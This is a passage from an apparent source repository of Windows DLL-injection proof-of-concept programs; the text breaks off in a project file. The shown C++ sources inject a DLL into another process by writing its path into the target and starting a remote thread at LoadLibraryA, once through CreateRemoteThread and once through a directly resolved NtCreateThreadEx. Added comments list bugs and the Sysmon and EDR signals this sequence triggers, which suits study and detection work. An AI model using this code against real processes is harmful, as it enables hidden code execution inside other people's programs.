├── .gitignore ├── DLLInjection-CreateRemoteThread ├── DLLInjection-CreateRemoteThread.sln └── DLLInjection-CreateRemoteThread │ ├── DLLInjection-CreateRemoteThread.cpp │ ├── DLLInjection-CreateRemoteThread.vcxproj │ ├── DLLInjection-CreateRemoteThread.vcxproj.filters │ ├── pch.cpp │ └── pch.h ├── DLLInjection-NtCreateThreadEx ├── DLLInjection-NtCreateThreadEx.sln └── DLLInjection-NtCreateThreadEx │ ├── DLLInjection-NtCreateThreadEx.cpp │ ├── DLLInjection-NtCreateThreadEx.vcxproj │ ├── DLLInjection-NtCreateThreadEx.vcxproj.filters │ ├── pch.cpp │ └── pch.h ├── DLLInjection-QueueUserAPC ├── DLLInjection-QueueUserAPC.sln └── DLLInjection-QueueUserAPC │ ├── DLLInjection-QueueUserAPC.cpp │ ├── DLLInjection-QueueUserAPC.vcxproj │ ├── DLLInjection-QueueUserAPC.vcxproj.filters │ ├── pch.cpp │ └── pch.h ├── DLLInjection-RtlCreateUserThread ├── DLLInjection-RtlCreateUserThread.sln └── DLLInjection-RtlCreateUserThread │ ├── DLLInjection-RtlCreateUserThread.cpp │ ├── DLLInjection-RtlCreateUserThread.vcxproj │ ├── DLLInjection-RtlCreateUserThread.vcxproj.filters │ ├── pch.cpp │ └── pch.h ├── DLLInjection-SetWindowsHookEx ├── DLLInjection-SetWindowsHookEx.sln └── DLLInjection-SetWindowsHookEx │ ├── DLLInjection-SetWindowsHookEx.cpp │ ├── DLLInjection-SetWindowsHookEx.vcxproj │ ├── DLLInjection-SetWindowsHookEx.vcxproj.filters │ ├── pch.cpp │ └── pch.h ├── PoC_Dll ├── PoC_Dll.sln └── PoC_Dll │ ├── PoC_Dll.cpp │ ├── PoC_Dll.vcxproj │ ├── PoC_Dll.vcxproj.filters │ ├── dllmain.cpp │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h ├── README.md └── SuspendInjectResume ├── SuspendInjectResume.sln └── SuspendInjectResume ├── SuspendInjectResume.cpp ├── SuspendInjectResume.vcxproj ├── SuspendInjectResume.vcxproj.filters ├── pch.cpp └── pch.h /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 
3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.suo 8 | *.user 9 | *.userosscache 10 | *.sln.docstates 11 | 12 | # User-specific files (MonoDevelop/Xamarin Studio) 13 | *.userprefs 14 | 15 | # Build results 16 | [Dd]ebug/ 17 | [Dd]ebugPublic/ 18 | [Rr]elease/ 19 | [Rr]eleases/ 20 | x64/ 21 | x86/ 22 | bld/ 23 | [Bb]in/ 24 | [Oo]bj/ 25 | [Ll]og/ 26 | 27 | # Visual Studio 2015/2017 cache/options directory 28 | .vs/ 29 | # Uncomment if you have tasks that create the project's static files in wwwroot 30 | #wwwroot/ 31 | 32 | # Visual Studio 2017 auto generated files 33 | Generated\ Files/ 34 | 35 | # MSTest test Results 36 | [Tt]est[Rr]esult*/ 37 | [Bb]uild[Ll]og.* 38 | 39 | # NUNIT 40 | *.VisualState.xml 41 | TestResult.xml 42 | 43 | # Build Results of an ATL Project 44 | [Dd]ebugPS/ 45 | [Rr]eleasePS/ 46 | dlldata.c 47 | 48 | # Benchmark Results 49 | BenchmarkDotNet.Artifacts/ 50 | 51 | # .NET Core 52 | project.lock.json 53 | project.fragment.lock.json 54 | artifacts/ 55 | **/Properties/launchSettings.json 56 | 57 | # StyleCop 58 | StyleCopReport.xml 59 | 60 | # Files built by Visual Studio 61 | *_i.c 62 | *_p.c 63 | *_i.h 64 | *.ilk 65 | *.meta 66 | *.obj 67 | *.iobj 68 | *.pch 69 | *.pdb 70 | *.ipdb 71 | *.pgc 72 | *.pgd 73 | *.rsp 74 | *.sbr 75 | *.tlb 76 | *.tli 77 | *.tlh 78 | *.tmp 79 | *.tmp_proj 80 | *.log 81 | *.vspscc 82 | *.vssscc 83 | .builds 84 | *.pidb 85 | *.svclog 86 | *.scc 87 | 88 | # Chutzpah Test files 89 | _Chutzpah* 90 | 91 | # Visual C++ cache files 92 | ipch/ 93 | *.aps 94 | *.ncb 95 | *.opendb 96 | *.opensdf 97 | *.sdf 98 | *.cachefile 99 | *.VC.db 100 | *.VC.VC.opendb 101 | 102 | # Visual Studio profiler 103 | *.psess 104 | *.vsp 105 | *.vspx 106 | *.sap 107 | 108 | # Visual Studio Trace Files 109 | *.e2e 110 | 111 | # TFS 2012 Local Workspace 112 | $tf/ 113 | 114 | # Guidance Automation Toolkit 115 | *.gpState 116 | 117 | # ReSharper is a .NET coding 
add-in 118 | _ReSharper*/ 119 | *.[Rr]e[Ss]harper 120 | *.DotSettings.user 121 | 122 | # JustCode is a .NET coding add-in 123 | .JustCode 124 | 125 | # TeamCity is a build add-in 126 | _TeamCity* 127 | 128 | # DotCover is a Code Coverage Tool 129 | *.dotCover 130 | 131 | # AxoCover is a Code Coverage Tool 132 | .axoCover/* 133 | !.axoCover/settings.json 134 | 135 | # Visual Studio code coverage results 136 | *.coverage 137 | *.coveragexml 138 | 139 | # NCrunch 140 | _NCrunch_* 141 | .*crunch*.local.xml 142 | nCrunchTemp_* 143 | 144 | # MightyMoose 145 | *.mm.* 146 | AutoTest.Net/ 147 | 148 | # Web workbench (sass) 149 | .sass-cache/ 150 | 151 | # Installshield output folder 152 | [Ee]xpress/ 153 | 154 | # DocProject is a documentation generator add-in 155 | DocProject/buildhelp/ 156 | DocProject/Help/*.HxT 157 | DocProject/Help/*.HxC 158 | DocProject/Help/*.hhc 159 | DocProject/Help/*.hhk 160 | DocProject/Help/*.hhp 161 | DocProject/Help/Html2 162 | DocProject/Help/html 163 | 164 | # Click-Once directory 165 | publish/ 166 | 167 | # Publish Web Output 168 | *.[Pp]ublish.xml 169 | *.azurePubxml 170 | # Note: Comment the next line if you want to checkin your web deploy settings, 171 | # but database connection strings (with potential passwords) will be unencrypted 172 | *.pubxml 173 | *.publishproj 174 | 175 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 176 | # checkin your Azure Web App publish settings, but sensitive information contained 177 | # in these scripts will be unencrypted 178 | PublishScripts/ 179 | 180 | # NuGet Packages 181 | *.nupkg 182 | # The packages folder can be ignored because of Package Restore 183 | **/[Pp]ackages/* 184 | # except build/, which is used as an MSBuild target. 
185 | !**/[Pp]ackages/build/ 186 | # Uncomment if necessary however generally it will be regenerated when needed 187 | #!**/[Pp]ackages/repositories.config 188 | # NuGet v3's project.json files produces more ignorable files 189 | *.nuget.props 190 | *.nuget.targets 191 | 192 | # Microsoft Azure Build Output 193 | csx/ 194 | *.build.csdef 195 | 196 | # Microsoft Azure Emulator 197 | ecf/ 198 | rcf/ 199 | 200 | # Windows Store app package directories and files 201 | AppPackages/ 202 | BundleArtifacts/ 203 | Package.StoreAssociation.xml 204 | _pkginfo.txt 205 | *.appx 206 | 207 | # Visual Studio cache files 208 | # files ending in .cache can be ignored 209 | *.[Cc]ache 210 | # but keep track of directories ending in .cache 211 | !*.[Cc]ache/ 212 | 213 | # Others 214 | ClientBin/ 215 | ~$* 216 | *~ 217 | *.dbmdl 218 | *.dbproj.schemaview 219 | *.jfm 220 | *.pfx 221 | *.publishsettings 222 | orleans.codegen.cs 223 | 224 | # Including strong name files can present a security risk 225 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 226 | #*.snk 227 | 228 | # Since there are multiple workflows, uncomment next line to ignore bower_components 229 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 230 | #bower_components/ 231 | 232 | # RIA/Silverlight projects 233 | Generated_Code/ 234 | 235 | # Backup & report files from converting an old project file 236 | # to a newer Visual Studio version. 
Backup files are not needed, 237 | # because we have git ;-) 238 | _UpgradeReport_Files/ 239 | Backup*/ 240 | UpgradeLog*.XML 241 | UpgradeLog*.htm 242 | ServiceFabricBackup/ 243 | *.rptproj.bak 244 | 245 | # SQL Server files 246 | *.mdf 247 | *.ldf 248 | *.ndf 249 | 250 | # Business Intelligence projects 251 | *.rdl.data 252 | *.bim.layout 253 | *.bim_*.settings 254 | *.rptproj.rsuser 255 | 256 | # Microsoft Fakes 257 | FakesAssemblies/ 258 | 259 | # GhostDoc plugin setting file 260 | *.GhostDoc.xml 261 | 262 | # Node.js Tools for Visual Studio 263 | .ntvs_analysis.dat 264 | node_modules/ 265 | 266 | # Visual Studio 6 build log 267 | *.plg 268 | 269 | # Visual Studio 6 workspace options file 270 | *.opt 271 | 272 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 273 | *.vbw 274 | 275 | # Visual Studio LightSwitch build output 276 | **/*.HTMLClient/GeneratedArtifacts 277 | **/*.DesktopClient/GeneratedArtifacts 278 | **/*.DesktopClient/ModelManifest.xml 279 | **/*.Server/GeneratedArtifacts 280 | **/*.Server/ModelManifest.xml 281 | _Pvt_Extensions 282 | 283 | # Paket dependency manager 284 | .paket/paket.exe 285 | paket-files/ 286 | 287 | # FAKE - F# Make 288 | .fake/ 289 | 290 | # JetBrains Rider 291 | .idea/ 292 | *.sln.iml 293 | 294 | # CodeRush 295 | .cr/ 296 | 297 | # Python Tools for Visual Studio (PTVS) 298 | __pycache__/ 299 | *.pyc 300 | 301 | # Cake - Uncomment if you are using it 302 | # tools/** 303 | # !tools/packages.config 304 | 305 | # Tabs Studio 306 | *.tss 307 | 308 | # Telerik's JustMock configuration file 309 | *.jmconfig 310 | 311 | # BizTalk build output 312 | *.btp.cs 313 | *.btm.cs 314 | *.odx.cs 315 | *.xsd.cs 316 | 317 | # OpenCover UI analysis results 318 | OpenCover/ 319 | 320 | # Azure Stream Analytics local run output 321 | ASALocalRun/ 322 | 323 | # MSBuild Binary and Structured Log 324 | *.binlog 325 | 326 | # NVidia Nsight GPU debugger configuration file 327 | *.nvuser 328 | 329 | # MFractors 
(Xamarin productivity tool) working folder 330 | .mfractor/ 331 | -------------------------------------------------------------------------------- /DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLInjection-CreateRemoteThread", "DLLInjection-CreateRemoteThread\DLLInjection-CreateRemoteThread.vcxproj", "{8D5696CE-04F9-4883-83D2-A7808CE673CC}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Debug|x64.ActiveCfg = Debug|x64 17 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Debug|x64.Build.0 = Debug|x64 18 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Debug|x86.ActiveCfg = Debug|Win32 19 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Debug|x86.Build.0 = Debug|Win32 20 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Release|x64.ActiveCfg = Release|x64 21 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Release|x64.Build.0 = Release|x64 22 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Release|x86.ActiveCfg = Release|Win32 23 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {C52ED0CF-6405-4CB3-A81B-88859FB280CF} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- 
/DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread.cpp:
--------------------------------------------------------------------------------
// DLLInjection-CreateRemoteThread.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
// Review notes: this listing was reconstructed from a collapsed page dump; the
// header names of the three system includes below were lost in extraction.

#include "pch.h"
#include
#include
#include

using namespace std;

// Loads the DLL at the hard-coded path into the process identified by
// `processid` with the classic four-call sequence: OpenProcess ->
// VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread whose start
// routine is kernel32!LoadLibraryA and whose argument is the remote copy of
// the path string.
//
// Returns TRUE after the remote thread has exited, FALSE if the process could
// not be opened or the remote thread could not be created.
//
// Defender note: this exact cross-process sequence is what CreateRemoteThread
// telemetry (Sysmon Event ID 8) and EDR cross-process memory-write monitoring
// are built to surface: a remote thread starting at LoadLibraryA with a
// freshly committed RW page holding a DLL path as its parameter.
//
// Review findings (documented, not fixed):
//  - PROCESS_ALL_ACCESS is requested although the calls below use only a
//    subset of those rights (least privilege).
//  - The VirtualAllocEx and WriteProcessMemory results are never checked, so a
//    NULL allocation or a failed write flows straight into CreateRemoteThread.
//  - `written` is a null pointer, so the byte count of the write is discarded.
//  - MEM_RESERVE is not a valid dwFreeType for VirtualFreeEx (only MEM_DECOMMIT
//    or MEM_RELEASE are), so the free fails and the remote buffer is leaked.
//  - hRemoteThread is never closed; hProcess is leaked on the failure path
//    after CreateRemoteThread.
//  - Returns the int macros FALSE/TRUE from a bool function and mixes `false`
//    with FALSE.
bool inject(int processid)
{
    HANDLE hProcess, AllocAdresse, hRemoteThread;
    int pid = processid;
    // Path the target will hand to LoadLibraryA; sizeof includes the NUL terminator.
    char dll_path[] = "C:\\DLLTest.dll";
    SIZE_T dll_len = sizeof(dll_path);

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
    if (hProcess == NULL)
    {
        cout << "[*] Could not create a handle to the process PID: " << pid << "\n";
        return FALSE;
    }

    // Commit a readable/writable region in the target for the path string.
    // NOTE(review): return value unchecked (NULL on failure).
    AllocAdresse = VirtualAllocEx(hProcess, 0, dll_len, MEM_COMMIT, PAGE_READWRITE);

    SIZE_T *written = 0;
    // Copy the path into the remote region. NOTE(review): BOOL result unchecked.
    WriteProcessMemory(hProcess, (void*)AllocAdresse, (void*)dll_path, dll_len, written);


    LPDWORD thread_id = 0;
    // Start a thread in the target at LoadLibraryA with the remote path as its
    // only argument. GetModuleHandle is called with a narrow literal, which only
    // compiles when the project's CharacterSet is MultiByte (the vcxproj dump
    // below shows that for one configuration only — confirm).
    hRemoteThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"), AllocAdresse, 0, thread_id);

    if (hRemoteThread == NULL)
    {
        cout << "Could not create a remote thread!\n";
        // NOTE(review): hProcess is not closed on this path.
        return FALSE;
    }

    cout << "RemoteThread was created.\n";
    // Block until the remote LoadLibraryA call has returned.
    WaitForSingleObject(hRemoteThread, INFINITE);
    cout << "Finished!\n";
    // NOTE(review): MEM_RESERVE is not a valid free type; this call fails and
    // the remote allocation stays mapped. hRemoteThread is also never closed.
    VirtualFreeEx(hProcess, AllocAdresse, dll_len, MEM_RESERVE);
    CloseHandle(hProcess);
    return TRUE;
}

// steps:
// OpenProcess
// hRemoteThread = virtualAllocEx
// WriteProcessMemory()
// hRemoteThread = CreateRemoteThread()
// WaitForSingleObject

// Injection of dll by remote thread
// check for injection of exe as remote thread
// injection techniques of dll
// check for traps
// in


// Entry point: walks the process list with the Toolhelp snapshot API, printing
// "<pid>\t<exe name>" for every process, and on each iteration calls inject()
// for the hard-coded PID 4264 until one call returns TRUE (the variant that
// uses the enumerated PID is commented out). Waits for a keypress before exit.
//
// Review findings (documented, not fixed): hSnapshot is not checked against
// INVALID_HANDLE_VALUE before Process32First; the target PID is hard-coded;
// `injected` is a bool initialised from the int macro FALSE.
int main(void)
{
    HANDLE hSnapshot;
    PROCESSENTRY32 ProcessEntry;
    // dwSize must be set before Process32First, otherwise the call fails.
    ProcessEntry.dwSize = sizeof(PROCESSENTRY32);
    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    bool injected = FALSE;

    if (Process32First(hSnapshot, &ProcessEntry))
    {
        do
        {
            cout << ProcessEntry.th32ProcessID << "\t" << ProcessEntry.szExeFile << "\n";
            if (injected == FALSE)
            {
                // injected = inject(ProcessEntry.th32ProcessID);
                injected = inject(4264);
            }
        } while (Process32Next(hSnapshot, &ProcessEntry));
    }
    CloseHandle(hSnapshot);
    getchar();
}
--------------------------------------------------------------------------------
/DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread.vcxproj:
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {8D5696CE-04F9-4883-83D2-A7808CE673CC} 24 | Win32Proj 25 | DLLInjectionCreateRemoteThread 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed
120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 
6 | -------------------------------------------------------------------------------- /DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLInjection-NtCreateThreadEx", "DLLInjection-NtCreateThreadEx\DLLInjection-NtCreateThreadEx.vcxproj", "{9867742A-F287-47D6-ADA2-D4549533B7FE}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Debug|x64.ActiveCfg = Debug|x64 17 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Debug|x64.Build.0 = Debug|x64 18 | 
{9867742A-F287-47D6-ADA2-D4549533B7FE}.Debug|x86.ActiveCfg = Debug|Win32 19 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Debug|x86.Build.0 = Debug|Win32 20 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Release|x64.ActiveCfg = Release|x64 21 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Release|x64.Build.0 = Release|x64 22 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Release|x86.ActiveCfg = Release|Win32 23 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {BFCAA45A-63CF-480A-B35A-DAE2E7E2D585} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx.cpp: -------------------------------------------------------------------------------- 1 | // DLLInjection-NtCreateThreadEx.cpp : This file contains the 'main' function. Program execution 2 | // begins and ends there. 
// Review notes: this listing was reconstructed from a collapsed page dump; the
// header names of the three system includes below were lost in extraction.

#include "pch.h"
#include
#include
#include

// Thin wrapper that resolves ntdll!NtCreateThreadEx at runtime and uses it to
// start a thread in `hProcess` at `lpBaseAddress` with `lpSpace` as the thread
// parameter (the caller below passes LoadLibraryA and a remote buffer holding
// a DLL path).
//
// Returns the new thread handle, or NULL if ntdll.dll or the export could not
// be resolved. NOTE(review): the status code returned by the native call is
// discarded, so a failed creation is only visible as hRemoteThread staying NULL.
//
// Defender note: calling ntdll directly bypasses the kernel32 CreateRemoteThread
// wrapper, but not the kernel: thread-creation callbacks (what Sysmon Event ID 8
// is built on) still observe a cross-process thread starting at
// kernel32!LoadLibraryA with a remote RW buffer as its argument.
HANDLE NtCreateThreadEx(
    HANDLE hProcess,
    LPVOID lpBaseAddress,
    LPVOID lpSpace
)
{
    //The prototype of NtCreateThreadEx from undocumented.ntinternals.com
    // NOTE(review): unofficial prototype; the four trailing parameters are all
    // passed as NULL/0 below.
    typedef DWORD(WINAPI * functypeNtCreateThreadEx)(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        BOOL CreateSuspended,
        DWORD dwStackSize,
        DWORD Unknown1,
        DWORD Unknown2,
        LPVOID Unknown3
    );
    HANDLE hRemoteThread = NULL;
    HMODULE hNtDllModule = NULL;
    functypeNtCreateThreadEx funcNtCreateThreadEx = NULL;
    //Get handle for ntdll which contains NtCreateThreadEx
    hNtDllModule = GetModuleHandle("ntdll.dll");
    if (hNtDllModule == NULL)
    {
        return NULL;
    }
    funcNtCreateThreadEx = (functypeNtCreateThreadEx)GetProcAddress(hNtDllModule, "NtCreateThreadEx");
    if (!funcNtCreateThreadEx)
    {
        return NULL;
    }
    // GENERIC_ALL requests full access on the returned thread handle; the thread
    // is created running (CreateSuspended = FALSE). Return status is ignored.
    funcNtCreateThreadEx(&hRemoteThread, GENERIC_ALL, NULL, hProcess, (LPTHREAD_START_ROUTINE)lpBaseAddress, lpSpace, FALSE, NULL, NULL, NULL, NULL);
    return hRemoteThread;
}

// Injects the DLL at the hard-coded path "C:\\v.dll" into the process with
// PID `process`: writes the path into the target and starts a thread there
// via NtCreateThreadEx(LoadLibraryA, <remote path>). Returns 0 on success,
// -1 on any failure.
//
// Review findings (documented, not fixed):
//  - `if (OpenProcess == NULL)` compares the address of the OpenProcess
//    function, not hProcess, so it is never true; and even when taken it only
//    prints and falls through. A NULL hProcess therefore reaches VirtualAllocEx.
//  - strlen(dll) excludes the terminating NUL, so the remote string is not
//    NUL-terminated; what the target's LoadLibraryA reads after the path
//    depends on the rest of the committed region.
//  - PROCESS_ALL_ACCESS is broader than the rights actually used.
//  - hProcess is leaked on every error path; hThread is never closed.
//  - Three getchar() calls block for three keypresses before cleanup.
int injectIntoPID(int process)
{
    DWORD pid = (DWORD)process;
    const char* dll = "C:\\v.dll";
    //Gets the process handle for the target process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    // NOTE(review): wrong operand — tests the function pointer, not hProcess.
    if (OpenProcess == NULL)
    {
        puts("Could not find process");
    }
    //Retrieves kernel32.dll module handle for getting loadlibrary base address
    HMODULE hModule = GetModuleHandle("kernel32.dll");
    //Gets address for LoadLibraryA in kernel32.dll
    LPVOID lpBaseAddress = (LPVOID)GetProcAddress(hModule, "LoadLibraryA");
    if (lpBaseAddress == NULL)
    {
        puts("Unable to locate LoadLibraryA");
        return -1;
    }
    //Allocates space inside the target process for the DLL path
    // NOTE(review): strlen(dll) bytes — no room for the NUL terminator.
    LPVOID lpSpace = (LPVOID)VirtualAllocEx(hProcess, NULL, strlen(dll), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (lpSpace == NULL)
    {
        printf("Could not allocate memory in process %u", (int)process);
        return -1;
    }
    //Write the DLL path to memory of the target process
    int n = WriteProcessMemory(hProcess, lpSpace, dll, strlen(dll), NULL);
    if (n == 0)
    {
        puts("Could not write to process's address space");
        return -1;
    }
    HANDLE hThread;

    hThread = NtCreateThreadEx(hProcess, lpBaseAddress, lpSpace);
    if (hThread == NULL)
    {
        return -1;
    }
    else
    {
        DWORD threadId = GetThreadId(hThread);
        DWORD processId = GetProcessIdOfThread(hThread);
        printf("Injected thread id: %u for pid: %u", threadId, processId);
        getchar();
        getchar();
        getchar();
        // NOTE(review): hThread is not closed.
        CloseHandle(hProcess);
        return 0;
    }
}

// Entry point: reads a PID from stdin, calls injectIntoPID, prints a failure
// message when it returns -1, then runs `pause` through system().
//
// Review findings (documented, not fixed): `char* argv` is a non-standard
// signature (argv should be char**; it is unused); scanf_s("%u") reads into an
// int; the banner says "NtCreateThread" although the wrapper used is
// NtCreateThreadEx (runtime string, left unchanged).
int main(int argc, char* argv)
{
    int pid;
    puts("Inject into which PID: ");
    scanf_s("%u", &pid);
    puts("Method used to attach thread is : NtCreateThread");
    int result = injectIntoPID(pid);
    if (result == -1)
    {
        puts("Could not inject into PID");
    }
    system("pause");
}
--------------------------------------------------------------------------------
/DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx.vcxproj:
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {9867742A-F287-47D6-ADA2-D4549533B7FE} 24 | Win32Proj 25 | DLLInjectionNtCreateThreadEx 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 |
